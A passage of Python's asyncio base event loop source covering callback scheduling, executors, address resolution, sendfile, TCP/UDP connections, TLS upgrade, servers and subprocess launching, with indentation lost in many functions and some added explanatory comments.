different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
    def call_at(self, when, callback, *args, context=None):
        """Like call_later(), but uses an absolute time.
        Absolute time corresponds to the event loop's time() method.
        Returns a TimerHandle that can be used to cancel the call.
        """
        self._check_closed()
        if self._debug:
            self._check_thread()
            self._check_callback(callback, 'call_at')
        timer = events.TimerHandle(when, callback, args, self, context)
        if timer._source_traceback:
            # Drop this frame so the debug traceback points at user code.
            del timer._source_traceback[-1]
        # Timers live in a heap ordered by deadline; _run_once() pops them.
        heapq.heappush(self._scheduled, timer)
        timer._scheduled = True
        return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
    def run_in_executor(self, executor, func, *args):
        """Run func(*args) in *executor*, returning an asyncio Future.

        When *executor* is None the loop's default ThreadPoolExecutor is
        used, lazily creating it on first use.
        """
        self._check_closed()
        if self._debug:
            self._check_callback(func, 'run_in_executor')
        if executor is None:
            executor = self._default_executor
            # Only check when the default executor is being used
            self._check_default_executor()
            if executor is None:
                executor = concurrent.futures.ThreadPoolExecutor(
                    thread_name_prefix='asyncio'
                )
                self._default_executor = executor
        # Bridge the concurrent.futures.Future into an asyncio future
        # bound to this loop.
        return futures.wrap_future(
            executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
warnings.warn(
'Using the default executor that is not an instance of '
'ThreadPoolExecutor is deprecated and will be prohibited '
'in Python 3.9',
DeprecationWarning, 2)
self._default_executor = executor
    def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
        """Debug-mode wrapper around socket.getaddrinfo() that logs the
        query and how long it took; slow lookups are logged at INFO."""
        msg = [f"{host}:{port!r}"]
        if family:
            msg.append(f'family={family!r}')
        if type:
            msg.append(f'type={type!r}')
        if proto:
            msg.append(f'proto={proto!r}')
        if flags:
            msg.append(f'flags={flags!r}')
        msg = ', '.join(msg)
        logger.debug('Get address info %s', msg)
        t0 = self.time()
        # Blocking call: this runs in an executor thread (see getaddrinfo()).
        addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
        dt = self.time() - t0
        msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
        if dt >= self.slow_callback_duration:
            # Resolution was slow enough to be worth surfacing at INFO.
            logger.info(msg)
        else:
            logger.debug(msg)
        return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
    async def getnameinfo(self, sockaddr, flags=0):
        """Asynchronous socket.getnameinfo(), run in the default executor
        so the (blocking) reverse lookup does not stall the loop."""
        return await self.run_in_executor(
            None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
_check_ssl_socket(sock)
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
    async def _sock_sendfile_fallback(self, sock, file, offset, count):
        """Portable sock_sendfile(): read the file in the executor and
        send each chunk with sock_sendall().  Returns bytes sent."""
        if offset:
            file.seek(offset)
        blocksize = (
            min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
            if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
        )
        buf = bytearray(blocksize)
        total_sent = 0
        try:
            while True:
                if count:
                    # Never read past the requested byte count.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        break
                # Zero-copy slice into the reusable buffer.
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    break  # EOF
                await self.sock_sendall(sock, view[:read])
                total_sent += read
            return total_sent
        finally:
            # Leave the file positioned just past the bytes actually sent,
            # even when an error interrupts the loop.
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
    async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
        """Create, bind and connect one socket.

        Per-attempt errors are appended to a private sub-list inside the
        caller-supplied *exceptions* so create_connection() can report
        them grouped per address.
        """
        my_exceptions = []
        exceptions.append(my_exceptions)
        family, type_, proto, _, address = addr_info
        sock = None
        try:
            sock = socket.socket(family=family, type=type_, proto=proto)
            sock.setblocking(False)
            if local_addr_infos is not None:
                # Try each resolved local address until one bind succeeds.
                for _, _, _, _, laddr in local_addr_infos:
                    try:
                        sock.bind(laddr)
                        break
                    except OSError as exc:
                        # Re-wrap with the address for a clearer message.
                        msg = (
                            f'error while attempting to bind on '
                            f'address {laddr!r}: '
                            f'{exc.strerror.lower()}'
                        )
                        exc = OSError(exc.errno, msg)
                        my_exceptions.append(exc)
                else:  # all bind attempts failed
                    raise my_exceptions.pop()
            await self.sock_connect(sock, address)
            return sock
        except OSError as exc:
            my_exceptions.append(exc)
            if sock is not None:
                sock.close()
            raise
        except:
            # Don't leak the socket on cancellation or other BaseExceptions.
            if sock is not None:
                sock.close()
            raise
    async def create_connection(
            self, protocol_factory, host=None, port=None,
            *, ssl=None, family=0,
            proto=0, flags=0, sock=None,
            local_addr=None, server_hostname=None,
            ssl_handshake_timeout=None,
            happy_eyeballs_delay=None, interleave=None):
        """Connect to a TCP server.
        Create a streaming transport connection to a given Internet host and
        port: socket family AF_INET or socket.AF_INET6 depending on host (or
        family if specified), socket type SOCK_STREAM. protocol_factory must be
        a callable returning a protocol instance.
        This method is a coroutine which will try to establish the connection
        in the background. When successful, the coroutine returns a
        (transport, protocol) pair.
        """
        # --- argument validation ---
        if server_hostname is not None and not ssl:
            raise ValueError('server_hostname is only meaningful with ssl')
        if server_hostname is None and ssl:
            # Use host as default for server_hostname. It is an error
            # if host is empty or not set, e.g. when an
            # already-connected socket was passed or when only a port
            # is given. To avoid this error, you can pass
            # server_hostname='' -- this will bypass the hostname
            # check. (This also means that if host is a numeric
            # IP/IPv6 address, we will attempt to verify that exact
            # address; this will probably fail, but it is possible to
            # create a certificate for a specific IP address, so we
            # don't judge it here.)
            if not host:
                raise ValueError('You must set server_hostname '
                                 'when using ssl without a host')
            server_hostname = host
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if sock is not None:
            _check_ssl_socket(sock)
        if happy_eyeballs_delay is not None and interleave is None:
            # If using happy eyeballs, default to interleave addresses by family
            interleave = 1
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            # Resolve the remote (and optionally the local) address.
            infos = await self._ensure_resolved(
                (host, port), family=family,
                type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
            if not infos:
                raise OSError('getaddrinfo() returned empty list')
            if local_addr is not None:
                laddr_infos = await self._ensure_resolved(
                    local_addr, family=family,
                    type=socket.SOCK_STREAM, proto=proto,
                    flags=flags, loop=self)
                if not laddr_infos:
                    raise OSError('getaddrinfo() returned empty list')
            else:
                laddr_infos = None
            if interleave:
                infos = _interleave_addrinfos(infos, interleave)
            exceptions = []
            if happy_eyeballs_delay is None:
                # not using happy eyeballs
                for addrinfo in infos:
                    try:
                        sock = await self._connect_sock(
                            exceptions, addrinfo, laddr_infos)
                        break
                    except OSError:
                        continue
            else:  # using happy eyeballs
                sock, _, _ = await staggered.staggered_race(
                    (functools.partial(self._connect_sock,
                                       exceptions, addrinfo, laddr_infos)
                     for addrinfo in infos),
                    happy_eyeballs_delay, loop=self)
            if sock is None:
                # Every address failed: flatten the per-address error lists.
                exceptions = [exc for sub in exceptions for exc in sub]
                if len(exceptions) == 1:
                    raise exceptions[0]
                else:
                    # If they all have the same str(), raise one.
                    model = str(exceptions[0])
                    if all(str(exc) == model for exc in exceptions):
                        raise exceptions[0]
                    # Raise a combined exception so the user can see all
                    # the various error messages.
                    raise OSError('Multiple exceptions: {}'.format(
                        ', '.join(str(exc) for exc in exceptions)))
        else:
            if sock is None:
                raise ValueError(
                    'host and port was not specified and no sock specified')
            if sock.type != socket.SOCK_STREAM:
                # We allow AF_INET, AF_INET6, AF_UNIX as long as they
                # are SOCK_STREAM.
                # We support passing AF_UNIX sockets even though we have
                # a dedicated API for that: create_unix_connection.
                # Disallowing AF_UNIX in this method, breaks backwards
                # compatibility.
                raise ValueError(
                    f'A Stream Socket was expected, got {sock!r}')
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r connected to %s:%r: (%r, %r)",
                         sock, host, port, transport, protocol)
        return transport, protocol
    async def _create_connection_transport(
            self, sock, protocol_factory, ssl,
            server_hostname, server_side=False,
            ssl_handshake_timeout=None):
        """Wrap an already-connected *sock* in a transport/protocol pair,
        optionally upgrading to TLS, and wait for the transport to signal
        readiness via the waiter future."""
        sock.setblocking(False)
        protocol = protocol_factory()
        waiter = self.create_future()
        if ssl:
            # ssl=True means "use a default SSL context".
            sslcontext = None if isinstance(ssl, bool) else ssl
            transport = self._make_ssl_transport(
                sock, protocol, sslcontext, waiter,
                server_side=server_side, server_hostname=server_hostname,
                ssl_handshake_timeout=ssl_handshake_timeout)
        else:
            transport = self._make_socket_transport(sock, protocol, waiter)
        try:
            await waiter
        except:
            # Includes cancellation: never leak a half-set-up transport.
            transport.close()
            raise
        return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
    async def _sendfile_native(self, transp, file, offset, count):
        # Stub: overridden by event loops that support os.sendfile();
        # the base implementation always forces the fallback path.
        raise exceptions.SendfileNotAvailableError(
            "sendfile syscall is not supported")
    async def _sendfile_fallback(self, transp, file, offset, count):
        """Generic sendfile() emulation: read the file in the executor and
        write chunks to the transport, honouring its flow control."""
        if offset:
            file.seek(offset)
        blocksize = min(count, 16384) if count else 16384
        buf = bytearray(blocksize)
        total_sent = 0
        # Helper protocol that pauses/resumes to apply back-pressure.
        proto = _SendfileFallbackProtocol(transp)
        try:
            while True:
                if count:
                    # Never read past the requested byte count.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        return total_sent
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    return total_sent  # EOF
                await proto.drain()
                transp.write(view[:read])
                total_sent += read
        finally:
            # Leave the file positioned after the bytes actually sent and
            # restore the transport's original protocol/reading state.
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
            await proto.restore()
    async def start_tls(self, transport, protocol, sslcontext, *,
                        server_side=False,
                        server_hostname=None,
                        ssl_handshake_timeout=None):
        """Upgrade transport to TLS.
        Return a new transport that *protocol* should start using
        immediately.
        """
        if ssl is None:
            # The module-level 'ssl' import is None when the interpreter
            # was built without OpenSSL support.
            raise RuntimeError('Python ssl module is not available')
        if not isinstance(sslcontext, ssl.SSLContext):
            raise TypeError(
                f'sslcontext is expected to be an instance of ssl.SSLContext, '
                f'got {sslcontext!r}')
        if not getattr(transport, '_start_tls_compatible', False):
            raise TypeError(
                f'transport {transport!r} is not supported by start_tls()')
        waiter = self.create_future()
        ssl_protocol = sslproto.SSLProtocol(
            self, protocol, sslcontext, waiter,
            server_side, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout,
            call_connection_made=False)
        # Pause early so that "ssl_protocol.data_received()" doesn't
        # have a chance to get called before "ssl_protocol.connection_made()".
        transport.pause_reading()
        transport.set_protocol(ssl_protocol)
        conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
        resume_cb = self.call_soon(transport.resume_reading)
        try:
            # The waiter completes once the TLS handshake is done.
            await waiter
        except BaseException:
            transport.close()
            conmade_cb.cancel()
            resume_cb.cancel()
            raise
        return ssl_protocol._app_transport
    async def create_datagram_endpoint(self, protocol_factory,
                                       local_addr=None, remote_addr=None, *,
                                       family=0, proto=0, flags=0,
                                       reuse_address=_unset, reuse_port=None,
                                       allow_broadcast=None, sock=None):
        """Create datagram connection.

        Returns a (transport, protocol) pair.  Either pass a pre-made
        *sock* (and no address/socket-option arguments), or local/remote
        addresses to be resolved and bound/connected here.
        """
        if sock is not None:
            if sock.type != socket.SOCK_DGRAM:
                raise ValueError(
                    f'A UDP Socket was expected, got {sock!r}')
            if (local_addr or remote_addr or
                    family or proto or flags or
                    reuse_port or allow_broadcast):
                # show the problematic kwargs in exception msg
                opts = dict(local_addr=local_addr, remote_addr=remote_addr,
                            family=family, proto=proto, flags=flags,
                            reuse_address=reuse_address, reuse_port=reuse_port,
                            allow_broadcast=allow_broadcast)
                problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
                raise ValueError(
                    f'socket modifier keyword arguments can not be used '
                    f'when sock is specified. ({problems})')
            sock.setblocking(False)
            r_addr = None
        else:
            if not (local_addr or remote_addr):
                if family == 0:
                    raise ValueError('unexpected address family')
                addr_pairs_info = (((family, proto), (None, None)),)
            elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
                # UNIX-domain datagram sockets take string paths.
                for addr in (local_addr, remote_addr):
                    if addr is not None and not isinstance(addr, str):
                        raise TypeError('string is expected')
                # Abstract-namespace addresses (leading NUL) are left alone.
                if local_addr and local_addr[0] not in (0, '\x00'):
                    try:
                        if stat.S_ISSOCK(os.stat(local_addr).st_mode):
                            os.remove(local_addr)
                    except FileNotFoundError:
                        pass
                    except OSError as err:
                        # Directory may have permissions only to create socket.
                        logger.error('Unable to check or remove stale UNIX '
                                     'socket %r: %r',
                                     local_addr, err)
                addr_pairs_info = (((family, proto),
                                    (local_addr, remote_addr)), )
            else:
                # join address by (family, protocol)
                addr_infos = {}  # Using order preserving dict
                for idx, addr in ((0, local_addr), (1, remote_addr)):
                    if addr is not None:
                        if not (isinstance(addr, tuple) and len(addr) == 2):
                            raise TypeError('2-tuple is expected')
                        infos = await self._ensure_resolved(
                            addr, family=family, type=socket.SOCK_DGRAM,
                            proto=proto, flags=flags, loop=self)
                        if not infos:
                            raise OSError('getaddrinfo() returned empty list')
                        for fam, _, pro, _, address in infos:
                            key = (fam, pro)
                            if key not in addr_infos:
                                addr_infos[key] = [None, None]
                            addr_infos[key][idx] = address
                # each addr has to have info for each (family, proto) pair
                addr_pairs_info = [
                    (key, addr_pair) for key, addr_pair in addr_infos.items()
                    if not ((local_addr and addr_pair[0] is None) or
                            (remote_addr and addr_pair[1] is None))]
                if not addr_pairs_info:
                    raise ValueError('can not get address information')
            exceptions = []
            # bpo-37228
            if reuse_address is not _unset:
                if reuse_address:
                    raise ValueError("Passing `reuse_address=True` is no "
                                     "longer supported, as the usage of "
                                     "SO_REUSEPORT in UDP poses a significant "
                                     "security concern.")
                else:
                    warnings.warn("The *reuse_address* parameter has been "
                                  "deprecated as of 3.5.10 and is scheduled "
                                  "for removal in 3.11.", DeprecationWarning,
                                  stacklevel=2)
            # Try each candidate (family, proto) pair until one socket
            # binds/connects successfully.
            for ((family, proto),
                 (local_address, remote_address)) in addr_pairs_info:
                sock = None
                r_addr = None
                try:
                    sock = socket.socket(
                        family=family, type=socket.SOCK_DGRAM, proto=proto)
                    if reuse_port:
                        _set_reuseport(sock)
                    if allow_broadcast:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                    sock.setblocking(False)
                    if local_addr:
                        sock.bind(local_address)
                    if remote_addr:
                        if not allow_broadcast:
                            await self.sock_connect(sock, remote_address)
                        r_addr = remote_address
                except OSError as exc:
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    # Includes cancellation: don't leak the socket.
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                raise exceptions[0]
        protocol = protocol_factory()
        waiter = self.create_future()
        transport = self._make_datagram_transport(
            sock, protocol, r_addr, waiter)
        if self._debug:
            if local_addr:
                logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
                            "created: (%r, %r)",
                            local_addr, remote_addr, transport, protocol)
            else:
                logger.debug("Datagram endpoint remote_addr=%r created: "
                             "(%r, %r)",
                             remote_addr, transport, protocol)
        try:
            await waiter
        except:
            transport.close()
            raise
        return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
    async def create_server(
            self, protocol_factory, host=None, port=None,
            *,
            family=socket.AF_UNSPEC,
            flags=socket.AI_PASSIVE,
            sock=None,
            backlog=100,
            ssl=None,
            reuse_address=None,
            reuse_port=None,
            ssl_handshake_timeout=None,
            start_serving=True):
        """Create a TCP server.
        The host parameter can be a string, in that case the TCP server is
        bound to host and port.
        The host parameter can also be a sequence of strings and in that case
        the TCP server is bound to all hosts of the sequence. If a host
        appears multiple times (possibly indirectly e.g. when hostnames
        resolve to the same IP address), the server is only bound once to that
        host.
        Return a Server object which can be used to stop the service.
        This method is a coroutine.
        """
        if isinstance(ssl, bool):
            raise TypeError('ssl argument must be an SSLContext or None')
        if ssl_handshake_timeout is not None and ssl is None:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if sock is not None:
            _check_ssl_socket(sock)
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            if reuse_address is None:
                # Default SO_REUSEADDR on POSIX (except Cygwin).
                reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
            sockets = []
            if host == '':
                hosts = [None]
            elif (isinstance(host, str) or
                  not isinstance(host, collections.abc.Iterable)):
                hosts = [host]
            else:
                hosts = host
            # Resolve every host concurrently.
            fs = [self._create_server_getaddrinfo(host, port, family=family,
                                                  flags=flags)
                  for host in hosts]
            infos = await tasks._gather(*fs, loop=self)
            # De-duplicate so each address is bound only once.
            infos = set(itertools.chain.from_iterable(infos))
            completed = False
            try:
                for res in infos:
                    af, socktype, proto, canonname, sa = res
                    try:
                        sock = socket.socket(af, socktype, proto)
                    except socket.error:
                        # Assume it's a bad family/type/protocol combination.
                        if self._debug:
                            logger.warning('create_server() failed to create '
                                           'socket.socket(%r, %r, %r)',
                                           af, socktype, proto, exc_info=True)
                        continue
                    sockets.append(sock)
                    if reuse_address:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
                    if reuse_port:
                        _set_reuseport(sock)
                    # Disable IPv4/IPv6 dual stack support (enabled by
                    # default on Linux) which makes a single socket
                    # listen on both address families.
                    if (_HAS_IPv6 and
                            af == socket.AF_INET6 and
                            hasattr(socket, 'IPPROTO_IPV6')):
                        sock.setsockopt(socket.IPPROTO_IPV6,
                                        socket.IPV6_V6ONLY,
                                        True)
                    try:
                        sock.bind(sa)
                    except OSError as err:
                        raise OSError(err.errno, 'error while attempting '
                                      'to bind on address %r: %s'
                                      % (sa, err.strerror.lower())) from None
                completed = True
            finally:
                # On any failure, close every socket created so far.
                if not completed:
                    for sock in sockets:
                        sock.close()
        else:
            if sock is None:
                raise ValueError('Neither host/port nor sock were specified')
            if sock.type != socket.SOCK_STREAM:
                raise ValueError(f'A Stream Socket was expected, got {sock!r}')
            sockets = [sock]
        for sock in sockets:
            sock.setblocking(False)
        server = Server(self, sockets, protocol_factory,
                        ssl, backlog, ssl_handshake_timeout)
        if start_serving:
            server._start_serving()
            # Skip one loop iteration so that all 'loop.add_reader'
            # go through.
            await tasks.sleep(0)
        if self._debug:
            logger.info("%r is serving", server)
        return server
    async def connect_accepted_socket(
            self, protocol_factory, sock,
            *, ssl=None,
            ssl_handshake_timeout=None):
        """Handle an accepted connection.
        This is used by servers that accept connections outside of
        asyncio but that use asyncio to handle connections.
        This method is a coroutine. When completed, the coroutine
        returns a (transport, protocol) pair.
        """
        if sock.type != socket.SOCK_STREAM:
            raise ValueError(f'A Stream Socket was expected, got {sock!r}')
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        # NOTE(review): sock was already dereferenced above, so this None
        # guard looks redundant — kept unchanged for parity with upstream.
        if sock is not None:
            _check_ssl_socket(sock)
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, '', server_side=True,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
        return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
    def default_exception_handler(self, context):
        """Default exception handler.
        This is called when an exception occurs and no exception
        handler is set, and can be called by a custom exception
        handler that wants to defer to the default behavior.
